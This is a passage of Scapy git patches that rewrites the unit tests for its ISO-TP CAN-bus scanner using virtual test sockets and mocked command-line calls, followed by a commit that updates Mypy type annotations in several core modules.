isotp_scan(scansock, range(0x5ff, 0x603 + 1), - can_interface=socks_interface, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - verbose=True) - result = sorted(result, key=lambda x: x.tx_id) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x602, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x01\xaa')) - for s in result: - # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=0x702, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x703, data=b'\x01\xaa')) - s.close() - cans.send(CAN(identifier=0x702, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x703, data=b'\x01\xaa')) - time.sleep(0) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - assert len(result) == 2 - assert 0x602 == result[0].tx_id - assert 0x702 == result[0].rx_id - assert 0x603 == result[1].tx_id - assert 0x703 == result[1].rx_id - for s in result: - del s - - -def test_isotpscan_none_2(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x700 + i, - did=0x600 + i) as s: - s.sniff(timeout=1000 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread1 = threading.Thread(target=isotpserver, args=(9,)) - thread2 = threading.Thread(target=isotpserver, args=(8,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - thread_noise.start() - with new_can_socket0() as socks_interface: - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x607, 0x60A), - can_interface=socks_interface, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - verbose=True) - result = sorted(result, key=lambda x: x.tx_id) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x609, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x608, data=b'\x01\xaa')) - for s in result: - # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=0x709, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x708, data=b'\x01\xaa')) - s.close() - time.sleep(0) - cans.send(CAN(identifier=0x709, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x708, data=b'\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - assert len(result) == 2 - assert 0x608 == result[0].tx_id - assert 0x708 == result[0].rx_id - assert 0x609 == result[1].tx_id - assert 0x709 == result[1].rx_id - for s in result: - del s - - -def test_extended_isotpscan_none(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i, - extended_addr=0x11, extended_rx_addr=0x22) as s: - s.sniff(timeout=500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - with new_can_socket0() as socks_interface: - thread_noise.start() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), - extended_scan_range=range(0x20, 0x30), - extended_addressing=True, - can_interface=socks_interface, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - verbose=True) - result = sorted(result, key=lambda x: x.tx_id) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x22\x01\xaa')) - time.sleep(0.00) - cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x22\x01\xaa')) - time.sleep(0.00) - cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x22\x01\xaa')) - for s in result: - # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=0x702, data=b'\x11\x01\xaa')) - cans.send(CAN(identifier=0x703, data=b'\x11\x01\xaa')) - s.close() - time.sleep(0) - cans.send(CAN(identifier=0x702, data=b'\x11\x01\xaa')) - cans.send(CAN(identifier=0x703, data=b'\x11\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - assert len(result) == 2 - assert 0x602 == result[0].tx_id - assert 0x702 == result[0].rx_id - assert 0x22 == result[0].ext_address - assert 0x11 == result[0].rx_ext_address - assert 0x603 == result[1].tx_id - assert 0x703 == result[1].rx_id - assert 0x22 == result[1].ext_address - assert 0x11 == result[1].rx_ext_address - for s in result: - del s - - -def test_isotpscan_none_random_ids(sniff_time=0.02): - rnd = RandNum(0x1, 0x50) - ids = set(rnd._fix() for _ in range(10)) - print(ids) - semaphore = threading.Semaphore(0) - def isotpserver(i): - try: - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x100 + i, did=i) as s: - s.sniff(timeout=1400 * sniff_time, count=1, - started_callback=semaphore.release) - warning("ISOTPServer 0x%x finished" % i) - except Exception as e: - warning("ERROR in isotpserver 0x%x" % i) - warning(e) +s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, padding=False, " \ + "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" +assert s1 in result +assert s2 in result + += scan with code output extended_isotp extended can id + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x1ffff702, rx_id=0x1ffff602, ext_address=0x11, rx_ext_address=0x22), ISOTPSoftSocket(sock_recv2, tx_id=0x1ffff703, rx_id=0x1ffff603, ext_address=0x11, rx_ext_address=0x22): + pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x1ffff5ff, 0x1ffff604 + 1), + output_format="code", + noise_listen_time=0.1, + sniff_time=0.05, + extended_scan_range=range(0x20, 0x30), + extended_addressing=True, + can_interface="can0", + verbose=True) + +s1 = "ISOTPSocket(can0, tx_id=0x1ffff602, rx_id=0x1ffff702, padding=False, " \ + "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" +s2 = "ISOTPSocket(can0, tx_id=0x1ffff603, rx_id=0x1ffff703, padding=False, " \ + "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" +print(result) +assert s1 in result +assert s2 in result + += scan default output + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603): + pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + noise_listen_time=0.1, + sniff_time=0.02, + can_interface=new_can_socket0(), + verbose=True) + +assert 0x602 == result[0].tx_id +assert 0x702 == result[0].rx_id +assert 0x603 == result[1].tx_id +assert 0x703 == result[1].rx_id + +for s in result: + s.close() + del s + += scan default output extended + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602, ext_address=0x11, rx_ext_address=0x22), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603, ext_address=0x11, rx_ext_address=0x22): pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - threads = [threading.Thread(target=isotpserver, args=(x,)) for x in ids] - [t.start() for t in threads] - for _ in range(len(threads)): - semaphore.acquire() - with new_can_socket0() as socks_interface: - thread_noise.start() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x001, 0x51), - can_interface=socks_interface, - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) - result = sorted(result, key=lambda x: x.tx_id) - with new_can_socket0() as cans: - for i in ids: - # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=i, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x100 + i, data=b'\x01\xaa')) - time.sleep(0) - cans.send(CAN(identifier=i, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x100 + i, data=b'\x01\xaa')) - for s in result: - # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) - s.close() - time.sleep(0) - cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) - [t.join(timeout=10) for t in threads] - thread_noise.join(timeout=10) - assert len(result) == len(ids) - ids = sorted(ids) - for i, s in zip(ids, result): - assert i == s.tx_id - assert i + 0x100 == s.rx_id - for s in result: - del s - - -def test_isotpscan_none_random_ids_padding(sniff_time=0.02): - rnd = RandNum(0x1, 0x50) - ids = set(rnd._fix() for _ in range(10)) - semaphore = threading.Semaphore(0) - def isotpserver(i): - try: - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x100 + i, did=i, padding=True) as s: - s.sniff(timeout=1400 * sniff_time, count=1, started_callback=semaphore.release) - warning("ISOTPServer 0x%x finished" % i) - except Exception as e: - warning("ERROR in isotpserver 0x%x" % i) - warning(e) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - threads = [threading.Thread(target=isotpserver, args=(x,)) for x in ids] - [t.start() for t in threads] - for _ in range(len(threads)): - semaphore.acquire() - with new_can_socket0() as socks_interface: - thread_noise.start() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x001, 0x51), - can_interface=socks_interface, - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) - result = sorted(result, key=lambda x: x.tx_id) - with new_can_socket0() as cans: - for i in ids: - # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=i, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x100 + i, data=b'\x01\xaa')) - time.sleep(0) - cans.send(CAN(identifier=i, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x100 + i, data=b'\x01\xaa')) - for s in result: - # This helps to close ISOTPSoftSockets - cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) - s.close() - cans.send(CAN(identifier=s.rx_id, data=b'\x01\xaa')) - cans.send(CAN(identifier=s.tx_id, data=b'\x01\xaa')) - time.sleep(0) - [t.join(timeout=10) for t in threads] - thread_noise.join(timeout=10) - assert len(result) == len(ids) - ids = sorted(ids) - for i, s in zip(ids, result): - assert i == s.tx_id - assert i + 0x100 == s.rx_id - if isinstance(s, ISOTPSoftSocket): - assert s.impl.padding is True - for s in result: - del s - -= Test scan() - -test_dynamic(test_scan) - -= Test scan_extended() - -test_dynamic(test_scan_extended) - -= Test isotp_scan(output_format=text) - -test_dynamic(test_isotpscan_text) - -= Test isotp_scan with padding (output_format=text) - -test_dynamic(test_isotpscan_text_padding) - -= Test isotp_scan(output_format=text) extended_can_id - -test_dynamic(test_isotpscan_text_extended_can_id) - -= Test isotp_scan(output_format=code) - -test_dynamic(test_isotpscan_code) - -= Test isotp_scan with noise (output_format=code) -~ disabled -test_dynamic(test_isotpscan_code_noise) - -= Test extended isotp_scan(output_format=code) -~ disabled -test_dynamic(test_extended_isotpscan_code) - -= Test extended isotp_scan(output_format=code) extended_can_id -~ disabled -test_dynamic(test_extended_isotpscan_code_extended_can_id) - -= Test isotp_scan(output_format=None) - -test_dynamic(test_isotpscan_none) - -= Test isotp_scan(output_format=None) 2 - -test_dynamic(test_isotpscan_none_2) - -= Test extended isotp_scan(output_format=None) - -test_dynamic(test_extended_isotpscan_none) - -= Test isotp_scan(output_format=None) random IDs - -test_dynamic(test_isotpscan_none_random_ids) - -= Test isotp_scan(output_format=None) random IDs padding -~ disabled -test_dynamic(test_isotpscan_none_random_ids_padding) + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + noise_listen_time=0.1, + sniff_time=0.02, + extended_scan_range=range(0x20, 0x30), + extended_addressing=True, + can_interface=new_can_socket0(), + verbose=True) + +assert 0x602 == result[0].tx_id +assert 0x702 == result[0].rx_id +assert 0x22 == result[0].ext_address +assert 0x11 == result[0].rx_ext_address +assert 0x603 == result[1].tx_id +assert 0x703 == result[1].rx_id +assert 0x22 == result[1].ext_address +assert 0x11 == result[1].rx_ext_address + +for s in result: + s.close() + del s + Cleanup diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 8a077a40e42..06776e12590 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -11,6 +11,7 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: ISOTPSocket = ISOTPSoftSocket +from mock import patch + Usage tests @@ -54,7 +55,7 @@ if six.PY2: = Test Python2 call -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-s", "0x600", "-e", "0x600", "-v", "-n", "0", "-t", "0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() @@ -64,7 +65,7 @@ assert expected_output in plain_str(std_out) = Test Python2 call with one python-can arg -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-a", "bitrate=500000", "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-a", "bitrate=500000", "-s", "0x600", "-e", "0x600", "-v", "-n", "0", "-t", "0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() @@ -75,7 +76,7 @@ assert expected_output in plain_str(std_out) = Test Python2 call with multiple python-can args -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-a", "bitrate=500000 receive_own_messages=True", "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-a", "bitrate=500000 receive_own_messages=True", "-s", "0x600", "-e", "0x600", "-v", "-n", "0", "-t", "0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() @@ -85,7 +86,7 @@ assert expected_output in plain_str(std_out) = Test Python2 call with multiple python-can args 2 -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "--python-can_args", "bitrate=500000 receive_own_messages=True", "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "--python-can_args", "bitrate=500000 receive_own_messages=True", "-s", "0x600", "-e", "0x600", "-v", "-n", "0", "-t", "0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() @@ -98,132 +99,90 @@ assert expected_output in plain_str(std_out) = Test standard scan -drain_bus(iface0) -started = threading.Event() - -def isotpserver(): - with new_can_socket(iface0) as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x600) as s: - s.sniff(timeout=200, count=1, started_callback=started.set) +exit_if_no_isotp_module() -sniffer = threading.Thread(target=isotpserver) -sniffer.start() -started.wait(timeout=10) +drain_bus(iface0) +recv_result = subprocess.Popen(("isotprecv -s 700 -d 600 -l " + iface0).split()) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x600", "-e", "0x600"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode1 = result.wait() std_out1, std_err1 = result.communicate() -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x600", "-e", "0x600"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) -returncode2 = result.wait() -std_out2, std_err2 = result.communicate() - -send_returncode = subprocess.call(['cansend', iface0, '600#01aa']) -sniffer.join(timeout=10) +recv_result.terminate() print(std_out1) print(std_err1) -assert 0 == send_returncode + assert returncode1 == 0 -assert returncode2 == 0 expected_output = [b'0x600', b'0x700'] for out in expected_output: - assert plain_str(out) in plain_str(std_out1 + std_out2) + assert plain_str(out) in plain_str(std_out1) = Test extended scan - -drain_bus(iface0) -started = threading.Event() - -def isotpserver(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb) as s: - s.sniff(timeout=200, count=1, started_callback=started.set) - -sniffer = threading.Thread(target=isotpserver) -sniffer.start() -started.wait(timeout=10) - -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) -returncode1 = result.wait() -std_out1, std_err1 = result.communicate() -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) -returncode2 = result.wait() -std_out2, std_err2 = result.communicate() - -send_returncode = subprocess.call(['cansend', iface0, '601#BB01aa']) -sniffer.join(timeout=10) - -expected_output = [b'0x601', b'0xbb', b'0x700', b'0xaa'] -assert 0 == send_returncode -assert returncode1 == 0 -assert returncode2 == 0 - -for out in expected_output: - assert plain_str(out) in plain_str(std_out1 + std_out2) - -= Test extended only scan - -drain_bus(iface0) -started = threading.Event() - -def isotpserver(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb) as s: - s.sniff(timeout=200, count=1, started_callback=started.set) - -sniffer = threading.Thread(target=isotpserver) -sniffer.start() -started.wait(timeout=10) - -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) -returncode1 = result.wait() -std_out1, std_err1 = result.communicate() -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) -returncode2 = result.wait() -std_out2, std_err2 = result.communicate() - -send_returncode = subprocess.call(['cansend', iface0, '601#BB01aa']) -sniffer.join(timeout=10) - -expected_output = [b'0x601', b'0xbb', b'0x700', b'0xaa'] -assert 0 == send_returncode -assert returncode1 == 0 -assert returncode2 == 0 - -for out in expected_output: - assert plain_str(out) in plain_str(std_out1 + std_out2) +~ python3_only + +def isotp_scan(sock, # type: SuperSocket + scan_range=range(0x7ff + 1), # type: Iterable[int] + extended_addressing=False, # type: bool + extended_scan_range=range(0x100), # type: Iterable[int] + noise_listen_time=2, # type: int + sniff_time=0.1, # type: float + output_format=None, # type: Optional[str] + can_interface=None, # type: Optional[str] + extended_can_id=False, # type: bool + verbose=False # type: bool + ): + # type: (...) -> Union[str, List[SuperSocket]] + assert sock is not None + assert 0x601 in scan_range + assert 0x602 not in scan_range + assert extended_addressing == True + assert 0 in extended_scan_range + assert 0xff in extended_scan_range + assert output_format == "text" + assert verbose == False + assert extended_can_id == False + assert "vcan0" in can_interface + return "Success" + +testargs = ["scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"] +with patch.object(sys, "argv", testargs), patch.object(scapy.contrib.isotp, "isotp_scan", isotp_scan): + from scapy.tools.automotive.isotpscanner import main + main() = Test scan with piso flag - -drain_bus(iface0) -started = threading.Event() - -def isotpserver(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb) as s: - s.sniff(timeout=200, count=1, started_callback=started.set) - -sniffer = threading.Thread(target=isotpserver) -sniffer.start() -started.wait(timeout=10) - -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x", "-C"], stdout=subprocess.PIPE) -returncode1 = result.wait() -std_out1, std_err1 = result.communicate() - -result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x", "-C"], stdout=subprocess.PIPE) -returncode2 = result.wait() -std_out2, std_err2 = result.communicate() - -send_returncode = subprocess.call(['cansend', iface0, '601#BB01aa']) -sniffer.join(timeout=10) - -assert 0 == send_returncode -assert returncode1 == 0 == returncode2 - -expected_output = [b'tx_id=0x601', b'rx_id=0x700', b'padding=False', b'ext_address=0xbb', b'rx_ext_address=0xaa'] -print(std_out1) -for out in expected_output: - assert plain_str(out) in plain_str(std_out1 + std_out2) +~ python3_only + +def isotp_scan(sock, # type: SuperSocket + scan_range=range(0x7ff + 1), # type: Iterable[int] + extended_addressing=False, # type: bool + extended_scan_range=range(0x100), # type: Iterable[int] + noise_listen_time=2, # type: int + sniff_time=0.1, # type: float + output_format=None, # type: Optional[str] + can_interface=None, # type: Optional[str] + extended_can_id=False, # type: bool + verbose=False # type: bool + ): + # type: (...) -> Union[str, List[SuperSocket]] + assert sock is not None + assert 0x601 in scan_range + assert 0x602 not in scan_range + assert extended_addressing == True + assert 0 in extended_scan_range + assert 0xff in extended_scan_range + assert output_format == "code" + assert verbose == False + assert extended_can_id == False + assert "vcan0" in can_interface + return "Success" + +testargs = ["scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x", "-C"] +with patch.object(sys, "argv", testargs), patch.object(scapy.contrib.isotp, "isotp_scan", isotp_scan): + from scapy.tools.automotive.isotpscanner import main + main() + Cleanup From b754f97d346e2db6e4a9e9cc6ff88010f502db89 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 3 Feb 2022 13:50:18 +0100 Subject: [PATCH 0733/1632] Update Mypy version --- scapy/ansmachine.py | 20 +++++++++++--------- scapy/asn1/asn1.py | 14 ++++++++------ scapy/asn1/ber.py | 7 +++---- scapy/asn1packet.py | 2 +- scapy/automaton.py | 6 ++++-- scapy/autorun.py | 2 +- scapy/base_classes.py | 26 ++++++++++++-------------- scapy/compat.py | 2 +- scapy/config.py | 2 +- scapy/extlib.py | 9 +++++++++ scapy/fields.py | 4 ++-- scapy/packet.py | 2 +- scapy/pipetool.py | 8 +++++--- scapy/sessions.py | 2 +- scapy/utils.py | 4 ++-- tox.ini | 3 ++- 16 files changed, 64 insertions(+), 49 deletions(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index a6eb993244f..2c1cc0c138c 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -28,40 +28,42 @@ Callable, Dict, Generic, - _Generic_metaclass, Optional, Tuple, Type, TypeVar, + _Generic_metaclass, + cast, ) _T = TypeVar("_T", Packet, PacketList) class ReferenceAM(_Generic_metaclass): - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] ): # type: (...) -> Type['AnsweringMachine[_T]'] - obj = super(ReferenceAM, cls).__new__(cls, name, bases, dct) + obj = cast('Type[AnsweringMachine[_T]]', + super(ReferenceAM, cls).__new__(cls, name, bases, dct)) try: import inspect obj.__signature__ = inspect.signature( # type: ignore - obj.parse_options # type: ignore + obj.parse_options ) except (ImportError, AttributeError): pass - if obj.function_name: # type: ignore + if obj.function_name: func = lambda obj=obj, *args, **kargs: obj(*args, **kargs)() # type: ignore # noqa: E501 # Inject signature - func.__qualname__ = obj.function_name # type: ignore + func.__name__ = func.__qualname__ = obj.function_name try: func.__signature__ = obj.__signature__ # type: ignore except (AttributeError): pass - globals()[obj.function_name] = func # type: ignore + globals()[obj.function_name] = func return obj @@ -130,11 +132,11 @@ def parse_all_options(self, mode, kargs): elif mode == 2 and kargs: k = self.optam0.copy() k.update(kargs) - self.parse_options(**k) # type: ignore + self.parse_options(**k) kargs = k omode = self.__dict__.get("mode", 0) self.__dict__["mode"] = mode - self.parse_options(**kargs) # type: ignore + self.parse_options(**kargs) self.__dict__["mode"] = omode return sendopt, sniffopt diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index f282ee6b377..cdb5b9c8a36 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -207,7 +207,7 @@ class ASN1_Class_metaclass(Enum_metaclass): element_class = ASN1Tag # XXX factorise a bit with Enum_metaclass.__new__() - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] @@ -228,7 +228,8 @@ def __new__(cls, # type: ignore rdict[v] = v dct["__rdict__"] = rdict - ncls = type.__new__(cls, name, bases, dct) # type: Type[ASN1_Class] + ncls = cast('Type[ASN1_Class]', + type.__new__(cls, name, bases, dct)) for v in six.itervalues(ncls.__dict__): if isinstance(v, ASN1Tag): # overwrite ASN1Tag contexts, even cloned ones @@ -284,15 +285,16 @@ class ASN1_Class_UNIVERSAL(ASN1_Class): class ASN1_Object_metaclass(_Generic_metaclass): - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] ): # type: (...) -> Type[ASN1_Object[Any]] - c = super(ASN1_Object_metaclass, cls).__new__( - cls, name, bases, dct - ) # type: Type[ASN1_Object[Any]] + c = cast( + 'Type[ASN1_Object[Any]]', + super(ASN1_Object_metaclass, cls).__new__(cls, name, bases, dct) + ) try: c.tag.register_asn1_object(c) except Exception: diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index c214c93744c..8782a2dca18 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -263,15 +263,14 @@ def BER_tagging_enc(s, implicit_tag=None, explicit_tag=None): class BERcodec_metaclass(_Generic_metaclass): - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] ): # type: (...) -> Type[BERcodec_Object[Any]] - c = super(BERcodec_metaclass, cls).__new__( - cls, name, bases, dct - ) # type: Type[BERcodec_Object[Any]] + c = cast('Type[BERcodec_Object[Any]]', + super(BERcodec_metaclass, cls).__new__(cls, name, bases, dct)) try: c.tag.register(c.codec, c) except Exception: diff --git a/scapy/asn1packet.py b/scapy/asn1packet.py index d0a16b0c01c..8f6e4a5b55a 100644 --- a/scapy/asn1packet.py +++ b/scapy/asn1packet.py @@ -28,7 +28,7 @@ class ASN1Packet_metaclass(Packet_metaclass): - def __new__(cls, # type: ignore + def __new__(cls, name, # type: str bases, # type: Tuple[type, ...] dct # type: Dict[str, Any] diff --git a/scapy/automaton.py b/scapy/automaton.py index 3270524b7fe..a86bbdece6e 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -533,9 +533,11 @@ def __call__(self, proto, *args, **kargs): class Automaton_metaclass(type): - def __new__(cls, name, bases, dct): # type: ignore + def __new__(cls, name, bases, dct): # type: (str, Tuple[Any], Dict[str, Any]) -> Type[Automaton] - cls = super(Automaton_metaclass, cls).__new__(cls, name, bases, dct) + cls = super(Automaton_metaclass, cls).__new__( # type: ignore + cls, name, bases, dct + ) cls.states = {} cls.recv_conditions = {} # type: Dict[str, List[_StateWrapper]] cls.conditions = {} # type: Dict[str, List[_StateWrapper]] diff --git a/scapy/autorun.py b/scapy/autorun.py index a99e756e92b..e9ea71328d3 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -168,7 +168,7 @@ def autorun_get_interactive_session(cmds, **kargs): try: try: sys.stdout = sys.stderr = sw - sys.excepthook = sys.__excepthook__ + sys.excepthook = sys.__excepthook__ # type: ignore res = autorun_commands_timeout(cmds, **kargs) except StopAutorun as e: e.code_run = sw.s diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 6ccc251aa83..84193639bad 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -230,10 +230,7 @@ def __contains__(self, other): return self.__class__(other) in self if type(other) is not self.__class__: return False - return cast( - bool, - (self.start <= other.start <= other.stop <= self.stop), - ) + return self.start <= other.start <= other.stop <= self.stop 